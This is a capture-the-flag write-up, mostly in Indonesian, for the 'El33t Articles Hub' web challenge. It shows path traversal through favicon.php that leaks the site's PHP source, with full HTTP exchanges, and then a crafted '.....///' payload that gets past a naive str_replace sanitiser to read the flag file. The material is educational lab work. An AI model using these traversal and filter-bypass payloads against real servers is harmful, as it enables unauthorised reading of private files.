Powered by GitBook

Masalah

El33t Articles Hub (200 Points)

Are you a person interested in reading articles on hacking? You’ve come to the right place, check out our brand new website for article-reading enthusiasts.

The portal is running on 128.199.224.175:22000

Penyelesaian

Untuk menyelesaikan soal tersebut bisa menggunakan Path Traversal pada halaman favicon.php?id=../index yang mendapatkan beberapa source code index.php, helpers.php, fetch.php, dan favicon.php.

// index.php

GET /favicon.php?id=../index HTTP/1.1
Host: 128.199.224.175:22000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=4uaevet642t76780ovfjfpnsm0
Connection: close

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2018 21:33:44 GMT
Server: Apache/2.4.18 (Ubuntu)
Pragma-directive: no-cache
Cache-directive: no-cache
Cache-control: no-store
Pragma: no-cache
Expires: 0
Content-Length: 1880
Connection: close
Content-Type: image/x-icon



<!DOCTYPE html>
<html>
  <head>

  <?php
    $favicon_id = mt_rand(1,7);
    echo "<link rel='shortcut icon' href='favicon.php?id=$favicon_id' type='image/x-icon'>";
  ?>

    <meta charset="UTF-8">
    <title>El33t Articles Hub</title>

  <link rel="stylesheet" href="css/bootstrap.min.css">
  <style type="text/css">
      #container {
        background-color: #fcf3cf   ;
        width: 60%;
        border: 1px solid grey;
        padding: 10px;
        margin: auto;
        margin-top: 10px;
        margin-bottom: 30px;
      }

      #container p {
        padding: 10px;
        font-size: 16px;
      }

      #header {
        height: 100px;
        margin: 20px;
        text-align: center;
        font-size: 24px;
      }

      body {
        background-color:  #f9e79f  ;
      }

  </style>

  </head>

  <body>

  <div id='header'>
        <b><u> El33t Articles Hub </u> </b>
  </div>

    <div id='container'>
    <?php
        error_reporting(0);
        require "fetch.php";
        require "helpers.php";

        $filename = !empty($_GET['file']) ? $_GET['file'] : "";

        if($filename !== "") {

            $filename = sanitize($filename);
            $file_contents = read_article($filename);
            echo "<p>";
            echo $file_contents;
            echo "</p>";
        }
        else {
            $files = scandir('./articles');
            echo "<ul>";
            foreach($files as $i) {
                $temp = new SplFileInfo($i);
                $ext = $temp->getExtension();
                if($ext !== "txt")
                    continue;
                $t = explode(".txt", $i)[0];
                echo "<li><h4><a href='?file=$t'> $t </a> </h4></li>";
            }
            echo "</ul>";
        }

    ?>

    </div>
    <center>
        <p> Copywrite &copy; El33t Articles Hub </p>
    </center>
  </body>

</html>

// helpers.php
GET /favicon.php?id=../helpers HTTP/1.1
Host: 128.199.224.175:22000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=4uaevet642t76780ovfjfpnsm0
Connection: close



HTTP/1.1 200 OK
Date: Fri, 02 Mar 2018 21:34:33 GMT
Server: Apache/2.4.18 (Ubuntu)
Pragma-directive: no-cache
Cache-directive: no-cache
Cache-control: no-store
Pragma: no-cache
Expires: 0
Content-Length: 771
Connection: close
Content-Type: image/x-icon

<?php

function article_not_found($name) {
    echo "<br><center>";
    echo "File \"$name\" not found !!";
    echo "</center>";
    die();
}

function sanitize($filename) {

    $evil_chars = array("php:", "secret/flag_7258689d608c0e2e6a90c33c44409f9d");
    foreach ($evil_chars as $value) {
        if( strpos($filename, $value) !== false) {
            echo "You naughty cheat !!<br>";
            die();
        }
    }

    // Sanitize input file name
    $bad_chars = array("./", "../");
    foreach ($bad_chars as $value) {
        $filename = str_replace($value, "", $filename);
    }

    $temp = new SplFileInfo($filename);
    $ext = $temp->getExtension();

    if( $ext !== "txt") {
        $filename = $filename.".txt";
    }

    return $filename;

}

?>

// fetch.php
GET /favicon.php?id=../fetch HTTP/1.1
Host: 128.199.224.175:22000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=4uaevet642t76780ovfjfpnsm0
Connection: close



HTTP/1.1 200 OK
Date: Fri, 02 Mar 2018 21:35:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Pragma-directive: no-cache
Cache-directive: no-cache
Cache-control: no-store
Pragma: no-cache
Expires: 0
Content-Length: 224
Connection: close
Content-Type: image/x-icon

<?php


function read_article($filename) {
    $file_content = file_get_contents("./articles/".$filename);

    if($file_content === false)
        article_not_found($filename);
    else
        return $file_content;

}

?>

// favicon.php

GET /favicon.php?id=../favicon HTTP/1.1
Host: 128.199.224.175:22000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=4uaevet642t76780ovfjfpnsm0
Connection: close


HTTP/1.1 200 OK
Date: Fri, 02 Mar 2018 21:35:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Pragma-directive: no-cache
Cache-directive: no-cache
Cache-control: no-store
Pragma: no-cache
Expires: 0
Content-Length: 857
Connection: close
Content-Type: image/x-icon

<?php

error_reporting(0);

$fav_id = !empty($_GET['id']) ? $_GET['id'] : '1';

header("Content-Type: image/x-icon"); 
header("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Cache-Control: no-store");
header("Pragma: no-cache");
header("Expires: 0");


$favicon = $fav_id;
$filepath = "./favicons/".$favicon;


if(file_exists($filepath . ".png")) {
    $favicon = $filepath . ".png";
}
else if (file_exists($filepath . ".php")) {
    $favicon = $filepath . ".php";
}
else if (file_exists($filepath . ".ico")) {
    $favicon = $filepath . ".ico";
}
else {
    $err_msg = "No files named '$filepath.png', '$filepath.ico'  or '$filepath.php' found ";
    echo $err_msg;
    die();
}


if(!file_exists($favicon)) {
    echo "File '$filepath' does not exist";
    die();
}

readfile($favicon); 

?>

Informasi rahasia ada pada direktori secret/flag_ namun dilindungi dengan fungsi sanitize yang menambahkan ekstensi .txt pada berkas. Sebenarnya berkas flag memang berekstensi .txt, untuk menyelesaikannya bisa menggunakan payload ini.

http://128.199.224.175:22000/?file=.....///secret/./flag_7258689d608c0e2e6a90c33c44409f9d

Jika diperiksa dengan seksama maka akan nampak seperti ini:

<?php


$filename = ".....///secret/./flag_7258689d608c0e2e6a90c33c44409f9d";

$evil_chars = array("php:", "secret/flag_7258689d608c0e2e6a90c33c44409f9d");
foreach ($evil_chars as $value) {
if( strpos($filename, $value) !== false) {
echo "You naughty cheat !!<br>";
die();
}
}

// Sanitize input file name
$bad_chars = array("./", "../");
foreach ($bad_chars as $value) {
$filename = str_replace($value, "", $filename);
}

$temp = new SplFileInfo($filename);
$ext = $temp->getExtension();

if( $ext !== "txt") {
$filename = $filename.".txt";
}

echo $filename;

$ php script.php 
../secret/flag_7258689d608c0e2e6a90c33c44409f9d.txt

results matching ""

No results matching ""